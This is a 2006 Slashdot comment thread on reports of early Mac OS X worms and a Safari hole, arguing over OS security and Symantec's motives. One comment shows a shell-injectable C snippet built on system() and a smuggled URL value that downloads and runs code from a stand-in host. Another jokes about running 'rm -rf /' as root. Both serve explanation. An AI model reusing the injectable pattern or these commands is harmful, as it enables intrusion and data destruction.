
Computer 'Worms' Turn on Macs

Posted by CmdrTaco
from the here-they-come dept.
Carl Bialik from WSJ writes "Macs have been largely immune to the viruses, worms and malware that have plagued PCs, but the Mac's recent popularity uptick has meant that 'bad guys appear to be casing the joint,' the Wall Street Journal reports. Among the signs: two recently discovered worms and the discovery of a vulnerability in Mac OS X that leaves Safari open to a hack. A Symantec engineer predicts a 'gradual erosion' of the idea that Macs are a safer operating system than Windows. 'Some security experts believe hackers are becoming more interested in writing nasty code for Macs precisely because of reports of its relative immunity to security woes,' the WSJ reports. 'Apple itself has gone out of its way not to promote the Mac's relative safety, lest it tempt hackers to prove the company wrong. Apple declined to discuss the topic of security in depth for this article.'"
  • Symantec? (Score:5, Insightful)

    by matt4077 (581118) on Monday February 27, 2006 @11:11AM (#14808255) Homepage
    A Symantec engineer predicts a 'gradual erosion' of the idea that Macs are a safer operating system than Windows.

    Now there's a neutral party with no agenda when it comes to security!

    Honestly, the worst Mac malware I've seen so far had a Symantec sticker on the box.
    • Re:Symantec? (Score:5, Insightful)

      by dantheman82 (765429) on Monday February 27, 2006 @11:21AM (#14808364) Homepage
      Apparently, they've had slow sales on the Mac platform recently. Perhaps a real worm/virus in the wild would be some newsworthy info...
      • Re:Symantec? (Score:4, Insightful)

        by peragrin (659227) on Monday February 27, 2006 @11:25AM (#14808404)
        A recent Symantec update did more damage to users' systems than the so-called recent virus script looking like an image did to all the computers it actually attacked.

        So yeah, Symantec sales would be slow.
      • Re:Symantec? (Score:3, Insightful)

        by l3prador (700532)
        Can anyone come up with a good reason why we rely on separate companies, who have a vested interest in there being dangerous virii out in the open so that people will buy their software? Why don't we hold the OS makers, who have a vested interest in their OS being free from these sorts of threats accountable for either eliminating vulnerabilities or providing their own anti virus software, as an integral part of the operating system? The only other source that could possibly be reliable would be the OSS c
    • Re:Symantec? (Score:4, Insightful)

      by twocents (310492) on Monday February 27, 2006 @11:24AM (#14808395)
      No kidding. Symantec would love their user base to expand, especially since MS is selling anti-virus software. It is legit to promote awareness of possible OS X exploits, but it is ridiculous to rely upon any information from a company such as Symantec - they have a vested interest in scaring the hell out of people that don't know any better.
    • Agreed: If you want Mac malware, you have to go to a store and buy it.

      It's completely unacceptable that Slashdot editors would post this garbage. From the referenced article:

      "In the past two weeks, information-security companies like Symantec Inc., Sophos PLC and McAfee Inc. have identified several security issues related to the latest version of Apple's Mac operating system, called OS X. Among the concerns: two "worms," programs written by unknown hackers that were designed to spread themselves to other Macs through Apple's iChat instant-messaging software and Bluetooth wireless-communications capability."

      Translation: Some public relations drone, with no technical knowledge, paid the Wall Street Journal to post the article. The Wall Street Journal is a "What the rich want you to think" publication, and, in my experience, usually unreliable for anything useful. Note that the article jumps from subject to subject rapidly, apparently to hide the fact that there are no actual incidents of Mac infections to report.

      Another translation: Symantec, a maker of very buggy security software of poor design, and other "security" companies want Mac users to buy their products.

      Some people, in my opinion, spend their entire working lives being dishonest, trying to trick other people. In my experience some of them work for WSJ.

      -
      Cheney's company is rapidly [nytimes.com] building prisons [halliburton.com] for the U.S. government.
  • Immune? (Score:2, Interesting)

    by east coast (590680)
    Macs have been largely immune to the viruses, worms and malware

    Just because no one has exploited a system doesn't mean it doesn't have exploits. I know about a month ago this came up in an article about how OSX/Linux users could face issues because they felt too secure. Hopefully they will be able to cut this off at the quick but don't think that running an "obscure" OS makes you safe. How many Mac users today run anti-virus software?
    • Re:Immune? (Score:5, Insightful)

      by SpooForBrains (771537) on Monday February 27, 2006 @11:14AM (#14808298)
      but don't think that running an "obscure" OS makes you safe

      *sigh* We don't. We think running an operating system with proper security makes us safe.
      • Or, you know, nicer software, better user interface, less learning curve for the parents and grandparents, better hardware, better industrial design, "UNIX inside ©" etc. IMHO, of course.
      • Re:Immune? (Score:2, Insightful)

        by somersault (912633)
        Yep, the last exploit relies on people to be morons and try to open an apparent 'picture' from a random spammer, or a strange website/whatever. Which could happen with any OS. Except if the user isn't running with full admin privileges then they are going to be fine anyway.
        • Re:Immune? (Score:4, Insightful)

          by IamTheRealMike (537420) <mike@plan99.net> on Monday February 27, 2006 @11:56AM (#14808706) Homepage
          No they aren't. You don't need admin privs to relay spam, hijack a web browser or force yourself to load at startup, which are just some of the things malware gets up to.

          I haven't seen any compelling evidence that Linux or MacOS X are more secure than Windows is against the twin threats of malicious software and badly trained users. They're all based on similar security ideas, which just don't cut the mustard. A better security model [plan99.net] does exist, but it's not implemented in any desktop operating system today.

    • How many Mac users today run anti-virus software?

      Running anti-virus software is a stupid thing to do when you can FIX the system instead.

      Just because Microsoft is at the "fix one bug, re-create another" stage doesn't mean Apple has to go the same road.

      An analogy - would you rather eat fresh, properly prepared food, or moldy infested crap and a megadose of antibiotics? (I would have used the "would you rather have sex with someone who isn't infected with HIV, or someone who is, but you take *precau

      • Re:Immune? (Score:3, Insightful)

        by east coast (590680)
        Running anti-virus software is a stupid thing to do when you can FIX the system instead.

        What's the phrase? There is no patch for human stupidity?

        Go ahead, be smug about it. But the bottom line is that as Mac becomes more popular you're going to have idiots who are going to let things through simply because they don't understand what they're doing. Do you really think that Windows users who keep their systems up to date and use a bit of common sense are the ones you're reading about? Windows is insecure in a l
        • I run antivirus software in Windows because Microsoft has unpatched bugs in their operating system that allow my machine to be infected by doing nothing other than being on a network, or, if I were using their browser, simply mistyping a URL and getting a malicious site, with no other intervention on my part. The only way my Mac will be infected is if I'm stupid enough to open up a file without vetting it first and type in my password when prompted. That's the difference in security between OS X and Windo
    • Exactly. Even as a Mac user I shudder when I hear the phrase, "more secure". How can you quantify security? I would consider it to be a binary measure, either you are secure or you aren't. And the answer is you are not.
      Basically it all comes down to being smart when using your computer. First and foremost is never run anything in any sort of admin mode unless absolutely necessary. Most Mac users create an admin account and use it for everything they do (and I hate to admit I am one of those), that i
    • Re:Immune? (Score:3, Insightful)

      How many Mac users today run anti-virus software?

      Hopefully very few. With the current state of affairs, anti-virus software for the Mac is a case of the cure being much worse than the disease. Even these recently discovered worms and the Safari vulnerability are relatively benign and can be protected against with a little common sense. In fact, most users hopefully are already safe from the Safari vulnerability since the "Open Safe Files" option was already the source of another vulnerability a while ba

    • What exactly does Mac anti-virus software do? There are still no real self-propagating malicious worms on the platform. Yes, AV software can check for a couple of Trojans and the usual collection of Office macro viruses, but I can avoid that stuff without AV software. Even if something really serious breaks out, the software won't do a damn bit of good until the anti-virus companies update their definitions. When there is a serious threat and the software actually blocks the threat, I will fork over the cas
    • Alright then, what OS makes us safe?

      I know OSX is safer by default than Windows. It's even safer than some Linux distros. That's not too shabby. I recommend an OS preconfigured with sane defaults like OSX or OpenBSD for computer illiterate users who want to access the internet. One could argue OSX is far more user-friendly than OpenBSD, atm, but some Linux distros are almost within their reach.

      If we recommend sane defaults maybe we can get some sleep at night, huh?
    • How many Mac users today run anti-virus software?

      Well, until just a few weeks ago, there was nothing to scan for, except Windows viruses! So what would the point have been?

      The major vendors have engines ready to scan, but things will have to get a whole lot worse and more regular before I will pay up and slow down my system with one of those bastards....

    • It's all about the Market Share. The larger the market share, the more people will take shots at you. So while security through obscurity is not truly secure, it does reduce your likelihood of being hacked.

      -Rick
    • I know about a month ago this came up in an article about how OSX/Linux users could face issues because they felt too secure.

      I dunno. How many Mac/Linux users still open attachments from strangers just because they can and say "HA HA! You couldn't do this on a Windows PC without getting infected by a virus! Now I shall post in the forums about my little adventure of opening unsafe attachments!"

      Seriously, most people are going on about this like Linux and Mac users like to browse google looking with the searc
  • by minus_273 (174041) <aaaaa@SPAM.ya h o o . com> on Monday February 27, 2006 @11:12AM (#14808263) Journal
    Seriously, if you have to manually download the program and enter your admin password, it is not a virus or a worm. I don't know why people keep calling it that. It is a Trojan and those have existed since the first rm -rf / script.
    • How hard would it be to convince some average users that the worm/virus/trojan that they're downloading is actually an amazing tool to "tweak" some aspect of their computer's performance (internet/speed/ram/etc...)?

      Any such program could say that it just needs you to enter your password so that it can perform its miracles on your system, and let you have a faster computer without paying for it.

      Everyone wants something for free, and there are enough average users that don't know any better.

      The social engin
      • You can't really patch social engineering, and it isn't the fault of the OS, is it? I am sure there are things Apple can do to limit the damage, but once a person has entered the password voluntarily in sudo, there is really not much you can do to stop it.
        • That's my point though. If everyone suddenly switched from Windows to OS X, then you're going to have some of the same problems. You may not have worms clogging the internet like you do now, but chances are you'll still have to routinely clean up your neighbours'/friends'/relatives' computers because of the nasty stuff that came in through the front door.
      • by AKAImBatman (238306) <akaimbatman.gmail@com> on Monday February 27, 2006 @11:31AM (#14808467) Homepage Journal
        How hard would it be to convince some average users that the worm/virus/trojan that they're downloading is actually an amazing tool to "tweak" some aspect of their computer's performance (internet/speed/ram/etc...)?

        The difference between the security hole approach and the social engineering approach is that the latter starts and ends with stupid users. The worm cannot force its way onto the computers of more savvy users like the RPC worms in Windows did. Instead, it will set off a huge number of warning flags with more experienced users, and perhaps prompt them to take action to clean other users' computers or encourage them not to run anything that asks for their password.

        The end result is that such viruses could not spread as fast or as far as their Windows counterparts.
    • In that case you just shaved several thousands off the present number of Windows viruses as most 'viruses' these days are actually malware attached to emails.

      Personally I would call them a 'viral trojan'.
      • .....'viruses' these days are actually malware attached to emails.....

        Except that opening the file on a Mac will not automatically install malware without asking for a password. All but totally stupid Mac users already know that opening a media file should not require them to type a password. Turning off the Safari auto open capability and setting Mail to only display plain text messages makes opening mail and surfing the web much safer. None of our Mac users know the admin password and that gives anothe
    • A worm propagates by itself without user intervention. While at first glance it may seem that means the user doesn't have to run it in the first place, that's a common misconception. What it means is, once the program is active it is then able to spread itself via the network without user intervention. Unlike a virus, which, once active, merely infects files which then must be transferred to another computer from the original infected computer manually by the user.

      The difference in a virus and worm is the method o
    • Granted it's a trojan, but it's a Trojan that is being passed virally... ie: once downloaded by the first ignoramus, it attempts to re-distribute itself via Address Book (the equivalent of Outlook's contact list) and iChat (IM messenger app with hooks into AOL, .Mac and Netscape) whereby it becomes a virally transmitted trojan so that other victims can proceed to clicky-click it, thinking it is from a trusted source and thereby starting the process over... with their Address Book of targets...

      Pretty nasty IM
    • by Dausha (546002) on Monday February 27, 2006 @12:42PM (#14809180) Homepage
      "It is a Trojan and those have existed since the first rm -rf / script."

      I don't get it. I tried running the "rm -rf /" script, and got nothing. I tried it again as root. It just sat there and worked patiently for a few minutes before returning a prompt. Was it supposed to do something cool? If so, maybe I should have run it on a desktop instead of the production server? Any hints at what I did wrong?

      Maybe I should try it on my Windows machine next? Shouldn't I type "C:\" instead? Or, is this script not that portable?
  • ...but I digress. Regular updates, safe web browsing, and not clicking email links should be the norm anyway regardless of operating system. Of course "safe web browsing" means different things to different people.
  • So the virus turns the computer on, even after they've been shut off? That's pretty cool.
    • So the virus turns the computer on, even after they've been shut off? That's pretty cool.
      Dude, that's not a bug, it's a feature.

      WakeOnLan has been doing this for years.

      (Don't blame Taco for the misleading headline, editors at the WSJ can screw up too)
  • Every reporter that misclassifies trojans and viruses as worms needs to be beaten over the head with a herring.

    Worms are very different than viruses. Don't mix them up! It's not that hard!
  • by pHatidic (163975) on Monday February 27, 2006 @11:14AM (#14808291)
    Windows has had what, like 200,000 viruses in the last year? Apple has had two or three theoretical exploits that either require the user to run code by hand or else target services that most Mac users don't turn on. Sounds like Apple is doing its job to me. And honestly this idea that as Apple gets more popular there will be more viruses is largely a load of crap. The notoriety of writing the first real virus for OS X would be vastly more than for writing yet another Windows virus. The reason why no one writes viruses for Apple is most likely because people like Apple and want them to succeed. I think if people start writing viruses for Apple it will be because Apple gets lazy and stops innovating, or else stops at least trying to fix the bugs in its software. Because right now both the means and the motive are there, but it's just not really happening.
    • by djtack (545324) on Monday February 27, 2006 @11:38AM (#14808535)
      The reason why no one writes viruses for Apple is most likely because people like Apple and want them to succeed.

      Considering that the main incentive for virus writers these days seems to be economic (profitable criminal activity such as spamming, phishing, DDOS blackmail, identity fraud), it seems unlikely to me that these criminals care if Apple succeeds. More likely, the profit motive isn't there, probably a result of the combination of greater security on OSX, and smaller installed base.
      • Considering that the main incentive for virus writers these days seems to be economic (profitable criminal activity such as spamming, phishing, DDOS blackmail, identity fraud), it seems unlikely to me that these criminals care if Apple succeeds.

        All of those require infection of a system, which requires the virus/Trojan/worm to copy itself from one system to another. The increasing number of Macs creates more dead-ends for a proliferating virus.

        Imagine two situations. In the first, everyone is using a Wi
    • And it's not like Symantec have a vested interest in making out that Apple is insecure so they can sell more dodgy AV and firewall products, or anything...

  • Most of the "worms" I've seen on Mac haven't actually been worms. They come in via safari and are disabled by unchecking a checkbox. It's not like the windows worms where they have a service that nobody uses listening on a port that is able to execute the code. And it doesn't trash the system because you don't have root access on by default.
  • by hattig (47930) on Monday February 27, 2006 @11:15AM (#14808314) Journal
    I guess this will test whether Apple's approach to security (i.e., pretty much like Unix's) is better or worse than Microsoft's.

    I.e., will these worms affect the whole computer because of a fault in the operating system, or will they affect only a single user on the computer because of a software issue that let the worm in to play in that user's space, or will it affect people only because of user stupidity ('ooh, really, clicking on this will make my pen0r bigger!')?

    Note that Microsoft gets critical security issues fairly often with their approach.

    The recent Apple issues have been lowest rated security issues.

    Certainly I think that not having users run as root by default will help Mac OS X, but that doesn't stop them entering their password when prompted.

    You can't secure against user stupidity except by scanning each file that they try to execute for viruses. And that means virus checkers, and the associated slowdowns they bring.
    • Certainly I think that not having users run as root by default will help Mac OS X, but that doesn't stop them entering their password when prompted. You can't secure against user stupidity except by scanning each file that they try to execute for viruses. And that means virus checkers, and the associated slowdowns they bring.

      I disagree. Creating a blacklist of malware is a way to make machines more secure, but it is only one third of the equation. In addition modern OS's should be implementing jails, A

    • The unfortunate thing is that for most PCs out there, they really only use one account; and from my small exposure to Mac users they tend to use even fewer system accounts. So in that sense they can't take over the entire box, but if all the stuff you cared about in your system is now gone, having an OS still there doesn't really give one any relief. In the grand scheme of things there is no difference, if all my docs are gone and I've got to reinstall the entire OS, or I've got an OS but all my docs are st
  • Folks don't need to worry.

    Using google images as a definitive source, I tried the following searches

    Microsoft worm

    and

    apple worm

    Surprisingly the Microsoft one was filled with warning messages and exclamation marks and maggots.

    Meanwhile the apple one was all cutesy and cartoony and fluffy (some of the worms even appear to be wearing turtle necks)

    The world will continue to turn.
  • A Symantec engineer predicts a 'gradual erosion' of the idea that Macs are a safer operating system than Windows.

    Well, yeah... Symantec has kind of a vested interest in gradually eroding that idea, don't they?
  • by endrue (927487)
    Every piece of code is subject to exploits. Show me a program/OS that is 100% infallible and I will show you a liar. I think that the main reason OS/X (and *nix for that matter) was considered to be rock-solid is because very few people were taking shots at it. Now I do realize that *nix-based OSs do plug up the obvious holes that MS left open. But don't assume that just because no one has broken into your house yet that your house is completely secure.

    A computer is only as secure as its maintainer.
    • Of course doing stuff in Linux rarely requires root access, unlike Windows. Now you can blame the app designers if you like (and I do), but setting an app to run as root while the rest of your work is done as a limited user is very easy in Linux, however I've yet to find a way on XP Home. Run As just isn't good enough, anything that runs at start up can't be set to run as a different user, and you also can't set it to be default behaviour, you have to keep doing Run As each time.
      I bet the Wintrolls will now
    • Now is it right for me to say that my linux computers are more secure just because they are running linux? No, that's stupid.

      It's not that Linux is secure. It's that Windows is *insecure*.

      Microsoft had a long period (perhaps over?) where they introduced *horribly* insecure designs -- making decisions that completely ignored security in the name of any shred of functionality that they might gain. (And those designs still affect us today.) Double-click execution of executables in email, using their full-bl
    • by 99BottlesOfBeerInMyF (813746) on Monday February 27, 2006 @12:32PM (#14809076)

      Now is it right for me to say that my linux computers are more secure just because they are running linux? No, that's stupid.

      Why is that stupid? There are real architectural, operational, testing, and implementation differences between Windows and Linux. Obviously one of them is more secure and less likely to be compromised than the other. There is nothing stupid about looking at those differences and at the track record of both OS's and making predictions and making usage decisions based upon that information. "They're all the same," is the argument of a lazy man or someone trying to justify a bad choice by trying to make all choices look equally bad.

      The same thing applies with this story - Macs can be exploited because that is the nature of the business. We usually find the holes because some numbnut exploits it.

      No one is arguing that Macs can't be exploited. They certainly can be and are. We do not, however, find most exploitable holes by seeing exploits in the wild. The majority of holes are discovered by developers coding the products. The next largest chunk are found by users and legitimate security researchers. Then a few are found when they are exploited in the wild by hackers. How many zero day exploits have there been for Linux or OS X? The answer is very, very few if any. There have been some for Windows, but most of the underlying vulnerabilities were probably discovered by MS, but they just did not get around to fixing them.

      Sure there will be exploits and even zero-day exploits for OS X, but they are just not likely to spread widely or be much of a problem for the average user. If they are a large threat they will be well-known and quickly fixed. A major worm for OS X would be news and it would be unusual. For Windows it is business as usual.

      But don't assume that just because no one has broken into your house yet that your house is completely secure.

      This is a very good analogy. My house is concrete block and was built with only glass block windows on the first floor. Actually the block is two thick on the first floor. Before I bought it, someone had wired a security system and outdoor flood lights. A few months back someone busted into my shed, but ran off without getting anything. The items in my shed are relatively large and not all that valuable.

      I'd say that is a good analogy for OS X. It is built with security in mind on well tested, industrial grade framework. They have added onto it and made it more secure in some ways and less secure in others, but it will likely never be as insecure as the neighbor's ranch style place with two plate glass doors and a key under the mat that you see the kids get out every day.

      OS X had someone break into the shed (try to distribute a trojan) but nothing has been taken. It is a good sign that maybe Apple and OS X users should be paying attention and maybe doing some more security reviews, but it is in no way comparable to the apartment complex down the street that has been burgled at least once a month for several years and where we always hear about people getting shot.

  • Macs are not "immune" to anything.

    They are not "targeted" due to their small market share. They are also not targeted due to the fact that they keep changing OSs, processors and whatnot such that any Mac (OSX PPC, OSX x86, OS9 PPC, OS9 Moto) is a subset of an already small market share.

    Windows is a huge bullseye due to its truly massive installed base. Linux will be the next target.
    • False logic. That is like saying that if tanks were more popular they would be less secure than light armored vehicles. While tanks may get shot at more if there were more of them around to be targets, it has absolutely nothing to do with how much damage the tank suffers. Popularity is not the same as security. Just because you are more of a target, doesn't make you any more vulnerable to the attacks.
  • ...bad guys appear to be casing the joint...
    Dang! Well, back to OS/2 for that good ol' "security by obscurity" strategy.
  • There are like 4 steps to protecting yourself against viruses on Macs:

    1) Leave your firewall on as many ports as possible. Only open it on non-major ports when you're actually using them (it's so easy to change if you want to)
    2) Block images in email and don't open DLed crap.
    3) Don't run as Admin. Make a new account, check the admin box, and uncheck yours.
    4) If you're super-paranoid, change the privileges to Terminal to take away everyone's access except root.

    These steps literally took 3 minutes on Tige
  • I've got your "bird" right here, Symantec.
  • The worms didn't appear to inflict any meaningful harm on Macs -- they required users to go through several steps on their computers before being infected.

    Doesn't the fact that they require user intervention to propagate make them not worms but trojan horses? Every OS is vulnerable to those, from Irix to Windows.
  • ...use RAID [apple.com]
  • Personally, these two "worms" for OS X don't worry me too much. They both seem to require user interaction in order to infect the system. What will really be of concern is a worm that can spread without the user being involved in any way. Personally, I think that OS X is much less likely to suffer from exploits of this type than Windows.
  • by jht (5006) on Monday February 27, 2006 @11:28AM (#14808432) Homepage Journal
    It's never been that (at least for most people). The advantage of Mac OS X is that it is less vulnerable than Windows (making Windows an easier target), and that Apple made decisions in the design process that mean that the typical consequences of a flaw are less severe. In recent years, Microsoft has attempted to harden Windows further and reduce their exposure - in W2K3 Server, for instance, they've done a pretty good job of it.

    Even if Apple magically pulls some sort of super OS-jujitsu that reverses their market share and Microsoft's, the basic architecture will stay the same underneath - and that means Apple will have their relative advantages intact for the foreseeable future. Windows is, at its heart, an OS that has traded off many security options for ease of access and ease of programming. Apple had the advantage of seeing what was already happening to Windows when they made their decisions about how OS X would be designed, plus the system it was derived from was pretty robust to begin with.

    There will be viruses that attack Mac OS X. Some will do a pretty good job of attacking. I'm kind of surprised it's taken this long to get there. But I'm also not expecting it ever to compare to Windows in that regard.
  • Some security experts believe hackers are becoming more interested in writing nasty code for Macs precisely because of reports of its relative immunity to security woes

    This is what I've been saying for a while. Really, it's kind of a self-evident thing. Let's face it, the hacker (and/or cracker) mentality is often to do things to see if/because it's possible. It's the entire point. Just like government targets have historically been more tempting because they're supposed to be more secure, the more 'impossi
  • Folks,

    The key thing to eyeball here, with all the FUD that has been stirred up, is there are OS vulnerabilities and application vulnerabilities. Much like the annual brouhaha when we compare Linux versus Windows, you must make a clear differentiation.

    Like Linux, I would never count, say an Apache hole against Mac nor Linux, since it's an application that is added after a base install. However, unlike Mac or Linux, Windows flaws are very much a hybrid. Windows really doesn't function much as Windows without
  • The day that I don't have to enter an admin password to modify a file in one of the root directories is the day that I start worrying about security on my Mac.

    -ch
  • by Kaimelar (121741) on Monday February 27, 2006 @11:33AM (#14808488) Homepage
    A recent columnist at Wired said what I was thinking already [wired.com]:

    From the linked article:

    "These Mac security holes are a storm in a teacup. They've inspired hundreds of stories in the press and even the national network news, but if they were Windows holes, no one would have blinked.

    That's because holes in Windows are routine, business as usual, while it now appears the Mac is under attack thanks to Apple's brand-new high profile. But this isn't the case.

    Last month, there were four "massive" virus attacks on Windows, according to Commtouch, an antispam and antivirus vendor. Indeed, viruses are now so aggressive, they routinely outpace attempts by antivirus companies to distribute protective signatures.

    This state of affairs is now so common, I hadn't noticed -- and I work for a technology news site. "Virulent computer virus infects millions worldwide, other non-news at 11."

    These Mac "threats" are only news because of their novelty, not the threat level they pose."

    • 40,000 people are killed in auto accidents every year in the U.S. and the only news it creates is the story about the traffic jam that it causes. But if a plane or train has one and a few people die, it makes big news and people become afraid to travel by plane or train.
  • Computer 'Worms' Turn on Macs

    Worst. Switch Ad. Ever.

  • As MS gives up its last true monopoly! ;)
  • ...what turned on Macs was a sexy iPod, just waiting for its upload.

    I guess it's hard to compete with an "aggressive worm".

  • ..the definition of FUD?!

    Seriously, it seems like every week that I read a slashdot article which proclaims that the days of the virus-free Mac environment are numbered, and that Mac users will soon be the number 1 target of the malware writers. It seems that if you can use the words "Mac" and "virus" ** in the same article then you're bound to get it posted on some tech news-sh^Hite. Then give it two or three days and virtually the same article will pop-up on the BBC's website with even more inflated dir
  • by plopez (54068) on Monday February 27, 2006 @11:49AM (#14808632) Journal
    Typical 'man bites dog' approach. If it is unusual, it is news. Microsoft Windows is a bug ridden unsecure OS, but since everyone (or at least 90% of users) use it it is not news. No one questions why a defective product exists or what it is actually costing in lost productivity. It is normal in most users' worlds, those users who never have experienced anything else.

    OS X exploits are news only because they are unusual (though it does serve as an early warning, I sincerely hope Apple is busy auditing their code base). The fact that they are not as severe as Windows exploits, require more user intervention and are often limited in scope is not discussed or probably understood by most people.
  • According to the Reg the OS X security exploits are largely academic [theregister.co.uk] and not serious threats.

    For the foreseeable future Microsoft Windows will remain a huge security risk [msversus.org].
  • I wonder if/when the new intel-macs will have dual-booting abilities and you are able to install Vista, or worse XP, on them, could this make the Apple-OS more vulnerable? I'm thinking rootkit-like viruses and assuming that Vista-security could be lacking.
  • Windows runs about 90% or more of all desktops. Apple and Linux make the vast majority of the remainder with everyone else totalling probably less than 1% of all desktops. As a result, if someone writes a virus, they more likely than not own a Windows machine, and thus have the capacity to target it. Also, there being lots of Windows desktops and the infection vector is larger it's a bigger target.

    As most malware attacks are for profit these days, the Windows environment, with its huge level of insecuri

  • Argh, what crap (Score:4, Insightful)

    by ThousandStars (556222) on Monday February 27, 2006 @12:34PM (#14809104) Homepage
    I already had a relative send me a link to this article. I'll copy my e-mail response:

    The guy who wrote this article doesn't know what he's talking about. "Worms" spread without any user interaction -- they can infect millions of machines on the internet in hours. Those are the kind of vulnerabilities that got Microsoft in trouble in 2003. Viruses require user interaction to work. All the "vulnerabilities" described in the article require the user to install a program and it's trivially easy to be destructive once you have the user's trust.

    In addition, virtually all the vulnerabilities described by the article are local ones -- meaning a malicious person needs access to the machine. Truly dangerous vulnerabilities offer remote access, which means any random hacker on the Internet can control the machine from afar. AFAIK, none have been discovered in most Linux distributions or OS X. If OS X did ship with remote vulnerabilities, THAT would be huge news.

    The only relevant part of the article comes at the very end:

    Many viruses and worms, for instance, don't exploit security holes in operating systems. Instead, they use what are called "social engineering" techniques to trick users into doing things that they shouldn't do, like unwittingly installing programs. The Anna Kournikova worm from 2001, for example, infamously tricked Windows users into installing it by masquerading as photos of the leggy Russian tennis star attached to e-mails.

    Rather than weaknesses in operating systems, such approaches exploit "a bug in peoples' brains, which is much harder to patch," Mr. Cluley says.

    That should have been the lead. The rest of the article is idiotic.

  • Among the signs: two recently discovered worms and the discovery of a vulnerability in OS X that leaves Safari open to a hack.

    The only worms I've seen announced for OS X so far have depended on social engineering attacks. Social engineering attacks are possible on any OS, because they work by convincing a user to do something. They're basically the same kind of "security hole" as the one the folks claiming to be an exiled dictator with a bundle of cash...

    The central security hole* found is one that was discovered almost two years ago, and Apple has refused to fix. That security hole is the use of the desktop shell interface to run programs to display untrusted content. As I wrote at the time [scarydevil.com] this is fundamentally insecure, and yet the native browsers and third party ones still do it.

    This is the same kind of error as having a browser on UNIX run an external viewer for a link with code like this:
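    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    /* Builds a shell command line around the URL and hands it to system(). */
    void run_application_on_url(char *app, char *url)
    {
      char *buffer = malloc(strlen(app)+strlen(url)+6);
      if(!buffer) panic("Out of memory on malloc"); /* panic() is assumed to be the program's own fatal-error routine */
      sprintf(buffer, "%s \"%s\" &", app, url);
      system(buffer);
      free(buffer);
    }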
    That would be a security hole you could drive a truck through, because you don't know what the shell is really going to do with whatever the URL contained. Maybe it looks like benign.pdf?";curl http : //badguy.xx/exploitcode>/tmp/...;sh /tmp/..." .

    Well, Safari doesn't really know what the shell (LaunchServices) or the app it calls is going to do, either. It's not quite as obviously bad as the above code, but it's subject to the same kinds of attacks. As has been shown multiple times already on both OS X and Windows.

    What's safe?

    Well, there's two options.

    1. Safari can maintain its own database of safe applications to pass unsafe files to, and call them directly rather than through LaunchServices.

    2. Apple can provide an alternate LaunchServices for unsafe content that ONLY contains applications that are explicitly designed for handling unsafe content, or alternatively add an option to LaunchServices saying that the content is unsafe so it can use an alternate database.

    Here's some options that have been tried and don't work:

    1. Maintain a list of file types and suffixes that you consider "safe", and only use LaunchServices to open these files (Safari and Firefox and IE do this).

    2. Modify LaunchServices to try and figure out when an application is being launched on an "unsafe" document, and ask the user if they really want to do this (Apple's 'fix' for the original hole, which has already failed twice).

    3. Maintain a list of locations that are "safe" and "unsafe", and only allow dangerous actions based on the location (Microsoft's Security Zones).

    So far Apple's tried two of these, let's hope they don't try the third.

    * Exacerbated by two other holes: making "Open Safe Files" the default, and considering archives to be "safe" files.
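Option 1 from the comment above (the browser keeps its own table of viewers and calls them directly), as an added C example that is not part of the original comment. The table contents, `/bin/echo` as a stand-in viewer, the sample URL and both function names are assumptions made for illustration.

```c
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Constructed allowlist: content type -> absolute path of a viewer trusted with
   untrusted input. /bin/echo is a stand-in so the example runs anywhere. */
static const char *const SAFE_VIEWERS[][2] = { { "application/pdf", "/bin/echo" } };
/* Constructed sample: a URL carrying shell metacharacters. */
static const char SAMPLE_URL[] = "http://example.invalid/a.pdf?\";echo injected;\"";

/* Fill argv for an allowlisted type and an http(s) URL; 0 on success, -1 if refused. */
int build_viewer_argv(const char *type, const char *url, const char *argv[3])
{
    size_t i, n = sizeof SAFE_VIEWERS / sizeof SAFE_VIEWERS[0];
    /* Requiring a scheme also stops a leading '-' being read as an option. */
    if (strncmp(url, "http://", 7) != 0 && strncmp(url, "https://", 8) != 0)
        return -1;
    for (i = 0; i < n; i++) {
        if (strcmp(type, SAFE_VIEWERS[i][0]) == 0) {
            argv[0] = SAFE_VIEWERS[i][1];
            argv[1] = url;      /* one argument, never parsed by a shell */
            argv[2] = NULL;
            return 0;
        }
    }
    return -1;                  /* unknown type: no fallback to a default handler */
}

/* Run the viewer directly with execv(), no shell; returns its exit status or -1. */
int open_untrusted(const char *type, const char *url)
{
    const char *argv[3];
    int status;
    pid_t pid;

    if (build_viewer_argv(type, url, argv) != 0)
        return -1;
    if ((pid = fork()) < 0)
        return -1;
    if (pid == 0) {
        execv(argv[0], (char *const *)argv);
        _exit(127);             /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void) { return open_untrusted("application/pdf", SAMPLE_URL); }
```

Run as is, the stand-in viewer prints the URL back unchanged, quotes and semicolons included, because the string reaches it as a single argument.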
  • by HermanAB (661181) on Monday February 27, 2006 @01:19PM (#14809580)
    Windows is so far ahead in the malware world, there is no way that any other system will ever catch up to the hundreds of thousands of viruses, worms and trojans that are essential to the full Windows experience.
  • by Shanep (68243) on Monday February 27, 2006 @02:31PM (#14810258) Homepage
    Symantec speaking badly of Macs should work for them both ways. Prevent people from switching away from the arch they sell most product for AND frighten Mac users into buying their crap.

    They will only be able to demonize Macs for so long, until people realise that they are harder to exploit on a large scale because they come with less insane defaults.

    BTW, if you really REALLY want to fuck up your Mac install... install some Symantec products. A serious downgrade.
